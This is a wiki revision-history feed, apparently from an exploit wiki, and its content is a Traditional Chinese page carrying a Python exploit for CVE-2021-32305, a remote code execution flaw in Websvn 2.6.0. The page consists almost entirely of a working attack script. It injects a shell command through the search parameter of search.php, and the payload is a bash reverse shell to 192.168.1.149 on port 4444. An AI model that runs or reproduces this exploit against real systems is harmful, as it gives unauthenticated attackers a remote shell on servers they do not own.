https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-32305_Websvn_2.6.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-tw
CVE-2021-32305 Websvn 2.6.0 遠程代碼執行漏洞/zh-tw - Revision history
2026-04-09T22:27:46Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-32305_Websvn_2.6.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-tw&diff=5850&oldid=prev
Pwnwiki: Created page with "==漏洞影響=="
2021-06-24T03:15:11Z
<p>Created page with "==漏洞影響=="</p>
<p><b>New page</b></p><div><languages /><br />
==漏洞影響==<br />
Version: 2.6.0<br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)<br />
# Date: 20/06/2021<br />
# Exploit Author: g0ldm45k<br />
# Vendor Homepage: https://websvnphp.github.io/<br />
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0<br />
# Version: 2.6.0<br />
# Tested on: Docker + Debian GNU/Linux (Buster)<br />
# CVE : CVE-2021-32305<br />
<br />
import requests<br />
import argparse<br />
from urllib.parse import quote_plus<br />
<br />
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"<br />
REQUEST_PAYLOAD = '/search.php?search=";{};"'<br />
<br />
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')<br />
parser.add_argument('target', type=str, help="Target URL.")<br />
<br />
args = parser.parse_args()<br />
<br />
if args.target.startswith("http://") or args.target.startswith("https://"):<br />
target = args.target<br />
else:<br />
print("[!] Target should start with either http:// or https://")<br />
exit()<br />
<br />
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))<br />
<br />
print("[*] Request send. Did you get what you wanted?")<br />
</pre></div>
Pwnwiki